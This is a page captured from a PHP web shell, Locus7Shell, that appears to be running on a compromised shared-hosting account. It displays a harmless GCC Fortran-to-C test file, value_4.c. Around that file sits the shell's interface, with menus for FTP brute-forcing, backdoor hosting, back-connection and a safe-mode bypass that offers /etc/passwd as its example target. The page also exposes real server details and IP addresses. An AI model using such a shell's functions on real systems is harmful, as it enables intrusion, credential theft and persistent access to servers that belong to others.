Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gfortran.dg/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     value_4.c (1.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*  Passing from fortran to C by value, using VALUE.  This is identical
    to c_by_val_1.c, which performs the same function for %VAL.

    Contributed by Paul Thomas <pault@gcc.gnu.org>  */

/* We used to #include <complex.h>, but this fails for some platforms
   (like cygwin) who don't have it yet.  */
#define complex __complex__
#define _Complex_I (1.0iF)

extern float *f_to_f__ (float, float*);
extern int *i_to_i__ (int, int*);
extern void c_to_c__ (complex float*, complex float, complex float*);
extern void abort (void);

/* In f_to_f and i_to_i we return the second argument, so that we do
   not have to worry about keeping track of memory allocation between
   fortran and C.  All three functions check that the argument passed
   by value is the same as that passed by reference.  Then the passed
   by value argument is modified so that the caller can check that
   its version has not changed.*/

float *
f_to_f__(float a1, float *a2)
{
  if ( a1 != *a2 ) abort();
  *a2 = a1 * 2.0;
  a1 = 0.0;
  return a2;
}

int *
i_to_i__(int i1, int *i2)
{
  if ( i1 != *i2 ) abort();
  *i2 = i1 * 3;
  i1 = 0;
  return i2;
}

void
c_to_c__(complex float *retval, complex float c1, complex float *c2)
{
  if ( c1 != *c2 ) abort();
  c1 = 0.0 + 0.0 * _Complex_I;
  *retval = *c2 * 4.0;
  return;
}


Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0059 ]--